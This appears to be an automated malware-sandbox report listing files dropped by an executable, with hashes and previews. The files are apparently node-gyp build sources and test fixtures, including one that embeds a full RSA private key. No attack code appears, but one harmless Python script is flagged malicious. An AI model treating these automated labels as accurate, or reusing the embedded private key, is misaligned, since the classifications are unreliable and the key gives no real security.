              Preview:/*. * When this file is linked to a DLL, it sets up a delay-load hook that. * intervenes when the DLL is trying to load the host executable. * dynamically. Instead of trying to locate the .exe file it'll just. * return a handle to the process image.. *. * This allows compiled addons to work when the host executable is renamed.. */..#ifdef _MSC_VER..#pragma managed(push, off)..#ifndef WIN32_LEAN_AND_MEAN.#define WIN32_LEAN_AND_MEAN.#endif..#include <windows.h>..#include <delayimp.h>.#include <string.h>..static FARPROC WINAPI load_exe_hook(unsigned int event, DelayLoadInfo* info) {. HMODULE m;. if (event != dliNotePreLoadLibrary). return NULL;.. if (_stricmp(info->szDll, HOST_BINARY) != 0). return NULL;.. m = GetModuleHandle(NULL);. return (FARPROC) m;.}..decltype(__pfnDliNotifyHook2) __pfnDliNotifyHook2 = load_exe_hook;..#pragma managed(pop)..#endif.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):112
              Entropy (8bit):4.833598361941119
              Encrypted:false
              SSDEEP:
              MD5:FD38678E848E4F173FFD01658ACCBEFB
              SHA1:DE00677A0273F7FC15CE2D43723FA47132E1FF5B
              SHA-256:047C9D07BBF168FA8617C6782F6B30629F9F05F356144C4F6B6C7977EC07F0AD
              SHA-512:CB596051627E65FEF299DC5662A6B2C2C564ED7D8AC7E2243B155EBF45419A03819D21E1002152CC137ECA35E3A2753AF9A2443BA808ED1CC601CF898D3742FD
              Malicious:false
              Reputation:unknown
              Preview:const envPaths = require('env-paths')..module.exports.devDir = () => envPaths('node-gyp', { suffix: '' }).cache.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):9323
              Entropy (8bit):4.801543925660499
              Encrypted:false
              SSDEEP:
              MD5:A35B97C860E9719D51C30D0CCBB2A652
              SHA1:038D3F3900FF109684C23C9CD9A0DE7A2EA64782
              SHA-256:C9B11D92154EA6A2C2AD1E7B52275FDB2DCE8E9E3C41A4BAD50BE46ECD94D67F
              SHA-512:4A69B47F23CA74924CD8920B5964E2A97B9DBB7D4AA8FD4BDC2E640FA94E9FFC7AC8397962A3A3189C94EDEDAB8CE91DAB55F4293811BB9B9DACD460DDDF90FC
              Malicious:false
              Reputation:unknown
              Preview:[{"path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\BuildTools","version":"15.9.28307.665","packages":["Microsoft.VisualStudio.Product.BuildTools","Microsoft.VisualStudio.Component.VC.CoreIde","Microsoft.VisualStudio.VC.Ide.Pro","Microsoft.VisualStudio.VC.Ide.Pro.Resources","Microsoft.VisualStudio.VC.Templates.Pro","Microsoft.VisualStudio.VC.Templates.Pro.Resources","Microsoft.VisualStudio.VC.Items.Pro","Microsoft.VisualStudio.PackageGroup.VC.CoreIDE.Reduced","Microsoft.VisualStudio.VC.Ide.MDD","Microsoft.VisualStudio.VC.Ide.x64","Microsoft.VisualStudio.PackageGroup.VC.CoreIDE.Express","Microsoft.VisualStudio.PackageGroup.Debugger.Script","Microsoft.VisualStudio.JavaScript.LanguageService","Microsoft.VisualStudio.JavaScript.LanguageService.Resources","Microsoft.VisualStudio.Debugger.Script.Msi","Microsoft.VisualStudio.Debugger.Script","Microsoft.VisualStudio.Debugger.Script","Microsoft.VisualStudio.Debugger.Script.Resources","Microsoft.VisualStudio.Debugger.Script.Resourc
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):18172
              Entropy (8bit):4.818346282576552
              Encrypted:false
              SSDEEP:
              MD5:7638FC8F9013B82D85D68B8812E3759E
              SHA1:BE291356364E4EAF1F4D983BC3BB85B44B68ADB6
              SHA-256:7209CB33701E0A8ADEE89A1EFAFF153C0F09657D2F6F0C6A965D6F34F06A81F4
              SHA-512:8CFE0E072A9317D68E6AF1E067EB45F6BC0493F71EA7341476BF325532C98166AE0C19DF4C6EAD8DF4B2A7D58F289B4987C32909188A7DC7B07DE38FAA2FE596
              Malicious:false
              Reputation:unknown
              Preview:[{"path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community","version":"15.9.28307.665","packages":["Microsoft.VisualStudio.Component.Windows10SDK.IpOverUsb","Win10SDK_IpOverUsb","Microsoft.VisualStudio.Component.VC.ATL.ARM64","Microsoft.VisualCpp.ATL.ARM64","Microsoft.VisualStudio.Component.VC.ATL.ARM","Microsoft.VisualCpp.ATL.ARM","Microsoft.VisualStudio.Component.VC.Tools.ARM","Microsoft.VisualCpp.Tools.HostX64.TargetX86.Resources","Microsoft.VisualStudio.Graphics.Analyzer.Resources","Microsoft.Icecap.Analysis","Microsoft.VisualCpp.CRT.Redist.arm.OneCore.Desktop","Microsoft.VisualCpp.CRT.arm.Store","Microsoft.VisualCpp.CRT.arm.Desktop","Microsoft.VisualStudio.PackageGroup.VC.Tools.x64.ARM","Microsoft.VisualCpp.Premium.Tools.Hostx86.Targetarm","Microsoft.VisualCpp.Premium.Tools.HostX86.TargetARM.Resources","Microsoft.VisualCpp.Premium.Tools.HostX64.TargetARM","Microsoft.VisualCpp.Premium.Tools.HostX64.TargetARM.Resources","Microsoft.VisualCpp.Premium.Tools.ARM.Base","
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):16656
              Entropy (8bit):4.797704256848128
              Encrypted:false
              SSDEEP:
              MD5:14950FA007C1C4A41AE393739EB2F1BB
              SHA1:A547374B229AFD80C3413303C088C9EB75620648
              SHA-256:5182F553CAB5A4DF2EA940946C373E17A71228F48CF6C7211E9864CC91766319
              SHA-512:1A768D9E2FD8711D9B5C79E53F66D91BB5CAC70F8262C1ADED8FB20B1EEC83C83EF47A9192FFFE37BA6F18C839CD48D458219BA379FA980C21634CE3391BD9F8
              Malicious:false
              Reputation:unknown
              Preview:[{"path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\WDExpress","version":"15.9.28307.858","packages":["Microsoft.VisualStudio.Product.WDExpress","Microsoft.VisualStudio.Workload.WDExpress","Microsoft.VisualStudio.Component.Windows10SDK.17763","MLGen","Win10SDK_10.0.17763","Microsoft.VisualStudio.Component.Windows10SDK.14393","Win10SDK_10.0.14393.795","Microsoft.VisualStudio.VC.Items.Pro","Microsoft.VisualStudio.VC.Ide.Pro","Microsoft.VisualStudio.VC.Ide.Pro.Resources","Microsoft.VisualStudio.Component.VC.Tools.ARM64","Microsoft.VisualStudio.VC.MSBuild.Arm64","Microsoft.VisualCpp.CRT.Redist.ARM64.OneCore.Desktop","Microsoft.VisualCpp.CRT.Redist.ARM64","Microsoft.VisualCpp.CRT.ARM64.OneCore.Desktop","Microsoft.VisualCpp.CRT.ARM64.Store","Microsoft.VisualCpp.CRT.ARM64.Desktop","Microsoft.VisualCpp.Tools.Hostx86.Targetarm64","Microsoft.VisualCpp.VCTip.hostX86.targetARM64","Microsoft.VisualCpp.Tools.HostX86.TargetARM64.Resources","Microsoft.VisualStudio.Component.VC.Tools.ARM"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):3941
              Entropy (8bit):4.898489360462589
              Encrypted:false
              SSDEEP:
              MD5:281B9376BD5B5E37DF6246C4FEFB97BF
              SHA1:4A7414FA094B9A93F29823CF0DD81AECC03BDD31
              SHA-256:7DED03374FEC8EBA1193E50E53B910B5F833BC682C55E7D8E9856E2048FE922A
              SHA-512:E3AE25B04A93F173ABB96625D9DB8308141F3A829AADA1E588F05FA91474BC84D4BBA5182EB64D78FA54BF62CDF3F9B8523A6B005DE54A2CFB3640D824F4DB8B
              Malicious:false
              Reputation:unknown
              Preview:[{"path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\BuildToolsUnusable","version":"15.9.28307.665","packages":["Microsoft.VisualStudio.Product.BuildTools","Microsoft.VisualStudio.Component.Windows10SDK.17134","Win10SDK_10.0.17134","Microsoft.VisualStudio.Component.VC.Tools.x86.x64","Microsoft.VisualCpp.CodeAnalysis.Extensions","Microsoft.VisualCpp.CodeAnalysis.Extensions.X86","Microsoft.VisualCpp.CodeAnalysis.ConcurrencyCheck.X86","Microsoft.VisualCpp.CodeAnalysis.ConcurrencyCheck.X86.Resources","Microsoft.VisualCpp.CodeAnalysis.Extensions.X64","Microsoft.VisualCpp.CodeAnalysis.ConcurrencyCheck.X64","Microsoft.VisualCpp.CodeAnalysis.ConcurrencyCheck.X64.Resources","Microsoft.VisualStudio.Component.Static.Analysis.Tools","Microsoft.VisualStudio.StaticAnalysis","Microsoft.VisualStudio.StaticAnalysis.Resources","Microsoft.VisualCpp.Tools.HostX64.TargetX86","Microsoft.VisualCpp.VCTip.HostX64.TargetX86","Microsoft.VisualCpp.Tools.HostX64.TargetX86.Resources","Microsoft.VisualC
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):10468
              Entropy (8bit):4.798045381614139
              Encrypted:false
              SSDEEP:
              MD5:E12310C8AD851F4D48B20C3C9F315E99
              SHA1:D6440DE9D88B4655BBF92DE9CFB3D7B1FFD511FC
              SHA-256:F26D5BD1E0EDD7D7A77259A6B82C9EB1A24F198F877B941ECED9FBE27225E30D
              SHA-512:25B0C251E75AE69A05B812B0609C4531829EC84D6C0C67AFA2B0EF86CC542514DA821FA640F2C5CB243B9066D99B6293C85F2D1DD5D7231FB8D1AA2F26A3A6B7
              Malicious:false
              Reputation:unknown
              Preview:[{"path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\BuildTools","version":"16.1.28922.388","packages":["Microsoft.VisualStudio.Product.BuildTools","Microsoft.VisualStudio.Component.VC.CoreIde","Microsoft.VisualStudio.VC.Ide.Pro","Microsoft.VisualStudio.VC.Ide.Pro.Resources","Microsoft.VisualStudio.VC.Templates.Pro","Microsoft.VisualStudio.VC.Templates.Pro.Resources","Microsoft.VisualStudio.VC.Items.Pro","Microsoft.VisualStudio.PackageGroup.VC.CoreIDE.Reduced","Microsoft.VisualStudio.VC.Ide.MDD","Microsoft.VisualStudio.PackageGroup.Core","Microsoft.VisualStudio.CodeSense.Community","Microsoft.VisualStudio.TestTools.TeamFoundationClient","Microsoft.PackageGroup.ClientDiagnostics","Microsoft.VisualStudio.AppResponsiveness","Microsoft.VisualStudio.AppResponsiveness.Targeted","Microsoft.VisualStudio.AppResponsiveness.Resources","Microsoft.VisualStudio.ClientDiagnostics","Microsoft.VisualStudio.ClientDiagnostics.Targeted","Microsoft.VisualStudio.ClientDiagnostics.Resources","Mi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):16624
              Entropy (8bit):4.796438377303922
              Encrypted:false
              SSDEEP:
              MD5:F821C9B404A043E51333EE37425E5515
              SHA1:C0079A3036FFB5382040C06CCEBCE97907406430
              SHA-256:FD29A69794E5B43DFBE966D3E037803DB5E58E1736C4FF7D60EC5DE72399E38C
              SHA-512:2F9B90FD3CBE26E137C7B00C1C649A5C2E568BAA896584F6B06FEBFEF5ED2B0CF0EF834BA02C5A64DA92782F9402771AC592C6395FF1238C6397547B3C41034B
              Malicious:false
              Reputation:unknown
              Preview:[{"path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community","version":"16.1.28922.388","packages":["Microsoft.VisualStudio.Workload.NativeDesktop","Microsoft.VisualStudio.Component.VC.TestAdapterForGoogleTest","Microsoft.VisualStudio.VC.Ide.TestAdapterForGoogleTest","Microsoft.VisualStudio.Component.VC.TestAdapterForBoostTest","Microsoft.VisualStudio.VC.Ide.TestAdapterForBoostTest","Microsoft.VisualStudio.Component.VC.ATL","Microsoft.VisualStudio.VC.Ide.ATL","Microsoft.VisualStudio.VC.Ide.ATL.Resources","Microsoft.VisualCpp.ATL.X86","Microsoft.VisualCpp.ATL.X64","Microsoft.VisualCpp.ATL.Source","Microsoft.VisualCpp.ATL.Headers","Microsoft.VisualStudio.Component.VC.CMake.Project","Microsoft.VisualStudio.VC.CMake","Microsoft.VisualStudio.VC.CMake.Project","Microsoft.VisualStudio.VC.ExternalBuildFramework","Microsoft.VisualStudio.ComponentGroup.NativeDesktop.Core","Microsoft.VisualStudio.PackageGroup.TestTools.Native","Microsoft.VisualStudio.Component.VC.Redist.14.Latest"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):17914
              Entropy (8bit):4.776324944484844
              Encrypted:false
              SSDEEP:
              MD5:7B96A17A0E75E10630CE4D27F9D858C5
              SHA1:394EC37E102C0C178458BEE6AD10788018E36930
              SHA-256:DF06BF7EF38347EC36E10BAE30C4F9749C0EE48A414AE7F0F05DC48C089C750C
              SHA-512:F47CDE3C22BB4DCD4777B94287D6204DA53F4108C6045152CFB48556AA23D76103A664B0F83AEC4C0C565A442A7D0986E89361630B0A8924FA037E30D1D37308
              Malicious:false
              Reputation:unknown
              Preview:[{"path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Preview","version":"16.0.28608.199","packages":["Microsoft.VisualStudio.Product.Enterprise","Microsoft.VisualStudio.Workload.NativeDesktop","Microsoft.VisualStudio.Component.VC.TestAdapterForGoogleTest","Microsoft.VisualStudio.VC.Ide.TestAdapterForGoogleTest","Microsoft.VisualStudio.Component.VC.TestAdapterForBoostTest","Microsoft.VisualStudio.VC.Ide.TestAdapterForBoostTest","Microsoft.VisualStudio.Component.VC.ATL","Microsoft.VisualStudio.VC.Ide.ATL","Microsoft.VisualStudio.VC.Ide.ATL.Resources","Microsoft.VisualCpp.ATL.X86","Microsoft.VisualCpp.ATL.X64","Microsoft.VisualCpp.ATL.Source","Microsoft.VisualCpp.ATL.Headers","Microsoft.VisualStudio.Component.VC.CMake.Project","Microsoft.VisualStudio.VC.CMake","Microsoft.VisualStudio.VC.CMake.Project","Microsoft.VisualStudio.VC.ExternalBuildFramework","Microsoft.VisualStudio.Component.VC.DiagnosticTools","Microsoft.VisualStudio.Component.Graphics.Tools","Microsoft.VisualStudi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):34193
              Entropy (8bit):4.686564038544793
              Encrypted:false
              SSDEEP:
              MD5:C95D26A85B43AF4AE8E11219B6075D8C
              SHA1:EE497B5CA547F4286685A4F66F1EE30F71CC7C23
              SHA-256:41D4113C4665644AA7C67EC0CA686B550F8ACE3ACE318718278C0D35DFC4375D
              SHA-512:B2684FF8BEA6CDED361993B6F35E480E8656CAC4B71F91835082458D74F50470A2E87F7F2EE0EE48DCD2A87AA0FA28226309EA29AD665A5AD189F2A7D2657BDE
              Malicious:false
              Reputation:unknown
              Preview:[. {. "path": "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community",. "version": "17.4.33213.308",. "packages": [. "Microsoft.VisualStudio.Product.Community",. "Microsoft.VisualStudio.PackageGroup.LiveShare.VSCore",. "Microsoft.VisualStudio.LiveShare.VSCore",. "Microsoft.VisualStudio.Workload.NativeDesktop",. "Microsoft.VisualStudio.Component.VC.ASAN",. "Microsoft.VisualCpp.ASAN.X86",. "Microsoft.VC.14.34.17.4.ASAN.X86.base",. "Microsoft.VC.14.34.17.4.ASAN.X64.base",. "Microsoft.VC.14.34.17.4.ASAN.Headers.base",. "Microsoft.VisualStudio.VC.IDE.Project.Factories",. "Microsoft.VisualStudio.Component.VC.TestAdapterForGoogleTest",. "Microsoft.VisualStudio.VC.Ide.TestAdapterForGoogleTest",. "Microsoft.VisualStudio.Component.VC.TestAdapterForBoostTest",. "Microsoft.VisualStudio.VC.Ide.TestAdapterForBoostTest"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):8418
              Entropy (8bit):6.037162710746888
              Encrypted:false
              SSDEEP:
              MD5:8AFA20C00043A1F9D6CAE0C0757C6EDE
              SHA1:B479CA42C90C7501ED650B2F75BCB46CBA363D4E
              SHA-256:C5A8EF2C16753C732FB01187EEF2C592E9D9B571466CDCE8718E6E90D4333459
              SHA-512:DB2437768866C158125C1712E62D33C3E8FC3B6C561332F5606F34D4B4E3D51642048B657EEA4B76828C9CC39D869DF951C0B561D99C3405D89B664CB5AF1CA8
              Malicious:false
              Reputation:unknown
              Preview:module.exports['ca.key'] = `.-----BEGIN RSA PRIVATE KEY-----.MIIEowIBAAKCAQEAtTbG0k2UFUyCdZuip0TTEtXRHh57qosegrpHPBreSNTxt7OT.KfOUZp2rToTHeN9w0ZbV2eKRI5AuFx8Cmlm73/KIHKzSNTBATGMeeHnGaxvL/W/s.KJdTDRNf7/qCXHQ+gsuEWWCFzOZuHmmAQa2IBX2HAQTqXJI8+2iJ9gytFfJLxjqy.6O4u9ugZVHSyQJWs49tGRcWMlNm7EMStADFvJn3S11xe/kwIA2mSI/eddDnzL0Mx.AkR9dQBL66xOABLL5v3QQdhipfHluX6HLbDd/1YsFTuOpgvLRlr72rTAFrQZCokV.hXPiqstn5zJFW5arHakvMR0+OPaICF5feh/4qQIDAQABAoIBAHWg6exnWUF+GY0Y.CrwDS/QFASpI5UNt7M809bqJQlMKjyEMmvF3YJQ/soxUWlsWx1f1TjmR/V6VX6W4.hmsE5pRXDY13jTfja0lqacQQYAD02TRY63XpzIpHUlYnSWmUN2OVkgKmShQYW9C3.8P4xE4Nk2TaLJ0oRzy3uzOb/kXcVaJfknBRUnOhuaTSs+w4l4pPXueYA7xuHgVsL.Qq0S4kK+PmdwCMB7gzlAAQhCM3vQ1U4cjC9JIIKSmPy7BcvD0kBfVPIFQ2byGpA1.VkWBLSyeig0YxA5oIshK5cLiDIfBIiCSEzm4AMhVhGf0tbGEwiPljxKjbarYUUIi.ATMk83UCgYEA7kKeOveuPbMqxmT42swfa9OU5jLUjH+VExU0Kv3BbEjv/OGt0fac./cs1Ze3vnrtCHudVajocFjydb8B4c62DbA4/T+LcUw/HaMaORbOoICQidi/zZ1Lj.gjg8Ip2WKXEhSAwqUpaFd6w16NZOxiTh+NDaRKywwbe8j57eDH4uR6MCgYEAwrTS.q5ra6+WDGUFMs0y3GMbL8j14PGhxB
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):78
              Entropy (8bit):4.399085758001881
              Encrypted:false
              SSDEEP:
              MD5:01495F659EA5766686BF072BF82CEAC7
              SHA1:9A6622D5B7549186A6CEC35EB6BB0101ABAC104E
              SHA-256:CB61037C57E7944BC6896B1F924C8F32EAAE2D2010957E2F22BC3F5DD98BF138
              SHA-512:4925433948B2C443CACFC15800F4D73991CE8F62E6F34FD629C7119D448490A0C2CC6CD0881303FE8AC13E2C362A11554E9BDD7751F158D3E7BFE710DD897D5C
              Malicious:false
              Reputation:unknown
              Preview:# Test configuration.{. 'variables': {. 'build_with_electron': true. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):547
              Entropy (8bit):4.683377370819809
              Encrypted:false
              SSDEEP:
              MD5:74704BBE821123576E45AD617AD326D8
              SHA1:463A3F24FA456E76995E2B09EB9065EBB8F04C67
              SHA-256:E6B697CDA4273B67899EB945B650ED59FB6BCA1657EC58F46A6156DE17529E11
              SHA-512:28D3B7C35C49438D211654BF8F8EBE413A03D41262501F56967B95035FA933256C32162630538941BDEF8C1B33F797B74FDC5097CF14C84527C00B9E834414E7
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:import sys.import locale..try:. reload(sys).except NameError: # Python 3. pass...def main():. encoding = locale.getdefaultlocale()[1]. if not encoding:. return False.. try:. sys.setdefaultencoding(encoding). except AttributeError: # Python 3. pass.. textmap = {. "cp936": "\u4e2d\u6587",. "cp1252": "Lat\u012Bna",. "cp932": "\u306b\u307b\u3093\u3054",. }. if encoding in textmap:. print(textmap[encoding]). return True...if __name__ == "__main__":. print(main()).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3134
              Entropy (8bit):4.734942665734187
              Encrypted:false
              SSDEEP:
              MD5:A6C7B80748A5E2060CF74E8B3708D286
              SHA1:1C304C5BB308FC6D1E50E92CD26F4461C564DCF6
              SHA-256:8F8C775B63C744CC435C7E35A5F330B36149C5AA7F74800A1463234E27FCEE43
              SHA-512:B9ED770510112B11E4F69E9F6CD0AFF7E09693EB4B1CFC8EE57016FEC1058D7B998BBE2EAA68B7A9A2035EEB83954C09FBD9EA06BDFFDF260B962131DFD9DCBF
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const fs = require('graceful-fs').const childProcess = require('child_process')..function startsWith (str, search, pos) {. if (String.prototype.startsWith) {. return str.startsWith(search, pos). }.. return str.substr(!pos || pos < 0 ? 0 : +pos, search.length) === search.}..function processExecSync (file, args, options) {. var child, error, timeout, tmpdir, command. command = makeCommand(file, args).. /*. this function emulates child_process.execSync for legacy node <= 0.10.x. derived from https://github.com/gvarsanyi/sync-exec/blob/master/js/sync-exec.js. */.. options = options || {}. // init timeout. timeout = Date.now() + options.timeout. // init tmpdir. var osTempBase = '/tmp'. var os = determineOS(). osTempBase = '/tmp'.. if (process.env.TMP) {. osTempBase = process.env.TMP. }.. if (osTempBase[osTempBase.length - 1] !== '/') {. osTempBase += '/'. }.. tmpdir = osTempBase + 'processExecSync.' + Date.now() + Math.random(). fs.mkdirSync(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):2446
              Entropy (8bit):4.696507492641209
              Encrypted:false
              SSDEEP:
              MD5:A0BDE63BE640BD1822126EA3C3D65B68
              SHA1:E20A7788978EE81F543078CEA1B472011033D5CC
              SHA-256:7BCEF59D4B7C04B38397D300E9BA040136F452A2509B74FAF60C92DF36302A8E
              SHA-512:4AB8B8CD58545E0254D999BE761BBA6095DC7B8D65E9118DB9EF1F1D8AEE7CD7D89C3E651D923FE1F95CEAF7CB1F2678E9EC5378E8A26E60C1DEB910C392D257
              Malicious:false
              Reputation:unknown
              Preview:const Mocha = require('mocha')..class Reporter {. constructor (runner) {. this.failedTests = [].. runner.on(Mocha.Runner.constants.EVENT_RUN_BEGIN, () => {. console.log('Starting tests'). }).. runner.on(Mocha.Runner.constants.EVENT_RUN_END, () => {. console.log('Tests finished'). console.log(). console.log('****************'). console.log('* TESTS REPORT *'). console.log('****************'). console.log(). console.log(`Executed ${runner.stats.suites} suites with ${runner.stats.tests} tests in ${runner.stats.duration} ms`). console.log(` Passed: ${runner.stats.passes}`). console.log(` Skipped: ${runner.stats.pending}`). console.log(` Failed: ${runner.stats.failures}`). if (this.failedTests.length > 0) {. console.log(). console.log(' Failed test details'). this.failedTests.forEach((failedTest, index) => {. console.log(). console.log(` ${index + 1}.'${failedTest.test.full
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):641
              Entropy (8bit):4.61697721801361
              Encrypted:false
              SSDEEP:
              MD5:5CFC7CB2A58632E7FA0657FF573510AB
              SHA1:2F81AD2AEC95361E53B4E362997B413466C82BC1
              SHA-256:93B06587379D75A1CEEADCACB3AFB6AD5935A2E2D3B7F7905735E39922FCCF50
              SHA-512:A9FA88493C999B76C77BD39888381B51EE5484177AAB19D4886D19EC9D6C2902EF131035AF4F5A59E626CF653EAD664A9820CEDB59A9048DC0F64850E65ABEF9
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const http = require('http').const https = require('https').const server = http.createServer(handler).const port = +process.argv[2].const prefix = process.argv[3].const upstream = process.argv[4].var calls = 0..server.listen(port)..function handler (req, res) {. if (req.url.indexOf(prefix) !== 0) {. throw new Error('request url [' + req.url + '] does not start with [' + prefix + ']'). }.. var upstreamUrl = upstream + req.url.substring(prefix.length). https.get(upstreamUrl, function (ures) {. ures.on('end', function () {. if (++calls === 2) {. server.close(). }. }). ures.pipe(res). }).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):4841
              Entropy (8bit):4.836397198175807
              Encrypted:false
              SSDEEP:
              MD5:571D1CCB0368B71678AAB0A79E6FD9BD
              SHA1:ECAA340EB887F0AADA62E8A193108A40D7110609
              SHA-256:3C44E4A000E717C8A09368FEB456DBA9FB74D5DB7D9FDE32E011EC73F2B9082B
              SHA-512:482A820428912E10A75F93A718E581E9CB07C252E67311C99E4E92816052F18A635A424551AE27BB5A7B2CAC5E667793A79A81F673F33DBFB7D1A2053005CC90
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it } = require('mocha').const assert = require('assert').const path = require('path').const fs = require('graceful-fs').const childProcess = require('child_process').const os = require('os').const addonPath = path.resolve(__dirname, 'node_modules', 'hello_world').const nodeGyp = path.resolve(__dirname, '..', 'bin', 'node-gyp.js').const execFileSync = childProcess.execFileSync || require('./process-exec-sync').const execFile = childProcess.execFile..function runHello (hostProcess) {. if (!hostProcess) {. hostProcess = process.execPath. }. var testCode = "console.log(require('hello_world').hello())". return execFileSync(hostProcess, ['-e', testCode], { cwd: __dirname }).toString().}..function getEncoding () {. var code = 'import locale;print(locale.getdefaultlocale()[1])'. return execFileSync('python', ['-c', code]).toString().trim().}..function checkCharmapValid () {. var data. try {. data = execFileSync('python', ['fixtures/test-charmap.py'
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2606
              Entropy (8bit):5.09007057913032
              Encrypted:false
              SSDEEP:
              MD5:1A2B11EA34E0D07DB6BA7D568EB7AF3E
              SHA1:2155A78B5A98A6690E3D68361B473863F3B4B0C3
              SHA-256:3934487903F4C8B4B2E024482A098A5A51CB65FD965A81C22ADB286108A0234B
              SHA-512:603C88EFD9EF14DB1B604AAC8B2F95AF56CEA868CCBC09B50EB3430A9089FE8DC479DA70C86FF152E4634FCC1A6D44922011E484B2CFD558ED50DD3B188311CA
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it } = require('mocha').const assert = require('assert').const path = require('path').const devDir = require('./common').devDir().const gyp = require('../lib/node-gyp').const requireInject = require('require-inject').const configure = requireInject('../lib/configure', {. 'graceful-fs': {. openSync: function () { return 0 },. closeSync: function () { },. writeFile: function (file, data, cb) { cb() },. stat: function (file, cb) { cb(null, {}) },. mkdir: function (dir, options, cb) { cb() },. promises: {. writeFile: function (file, data) { return Promise.resolve(null) }. },. unlink: function (path, cb) { cb() },. symlink: function (target, path, cb) { cb() }. }.})..const EXPECTED_PYPATH = path.join(__dirname, '..', 'gyp', 'pylib').const SEPARATOR = process.platform === 'win32' ? ';' : ':'.const SPAWN_RESULT = cb => ({ on: function () { cb() } })..require('npmlog').level = 'warn'..describe('configure-python', function () {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2203
              Entropy (8bit):4.884240075787734
              Encrypted:false
              SSDEEP:
              MD5:963525CA4BAAB7CB0BC32EF9C819EDCF
              SHA1:0FD7668B546A8DCCA0B951BEBF974FE71FEC0539
              SHA-256:BD0A2E3C45F044E39C29681795B560A653BB3A672B22A48310145C58AD39EFF0
              SHA-512:D09EB388AB80E4E7A5D7E693FFED038D8648E91DBCEA7C43053EC320D974781FFCD78A1DED309F4756B4349B1EC42F95F7DD6CD70F88132C72EAB12502FA2F8D
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const path = require('path').const { describe, it } = require('mocha').const assert = require('assert').const gyp = require('../lib/node-gyp').const createConfigGypi = require('../lib/create-config-gypi').const { parseConfigGypi, getCurrentConfigGypi } = createConfigGypi.test..describe('create-config-gypi', function () {. it('config.gypi with no options', async function () {. const prog = gyp(). prog.parseArgv([]).. const config = await getCurrentConfigGypi({ gyp: prog, vsInfo: {} }). assert.strictEqual(config.target_defaults.default_configuration, 'Release'). assert.strictEqual(config.variables.target_arch, process.arch). }).. it('config.gypi with --debug', async function () {. const prog = gyp(). prog.parseArgv(['_', '_', '--debug']).. const config = await getCurrentConfigGypi({ gyp: prog, vsInfo: {} }). assert.strictEqual(config.target_defaults.default_configuration, 'Debug'). }).. it('config.gypi with custom options', async function ()
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7094
              Entropy (8bit):4.767242044353284
              Encrypted:false
              SSDEEP:
              MD5:A52888E6AE13D9132C6432BB286B5747
              SHA1:61DC5E04DEEF6DEE24E13C9DE002E850529981F2
              SHA-256:3D8173C877660064F9A715C4E5273F9CC16BC45CAD2F3CA006CA1063BAABD291
              SHA-512:6C75BCE7D34436E6184A0C2754A0B6AB7456DE8E545E2842DE1583FB3747DBE066DACAE339D8E01E561E9B1F038EC1FBA540DFD86C1485AFE6A39CC5316D5B98
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it, after } = require('mocha').const assert = require('assert').const fs = require('fs').const path = require('path').const util = require('util').const http = require('http').const https = require('https').const install = require('../lib/install').const semver = require('semver').const devDir = require('./common').devDir().const rimraf = require('rimraf').const gyp = require('../lib/node-gyp').const log = require('npmlog').const certs = require('./fixtures/certs')..log.level = 'warn'..describe('download', function () {. it('download over http', async function () {. const server = http.createServer((req, res) => {. assert.strictEqual(req.headers['user-agent'], `node-gyp v42 (node ${process.version})`). res.end('ok'). }).. after(() => new Promise((resolve) => server.close(resolve))).. const host = 'localhost'. await new Promise((resolve) => server.listen(0, host, resolve)). const { port } = server.address(). const gyp = {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2668
              Entropy (8bit):4.658911477424387
              Encrypted:false
              SSDEEP:
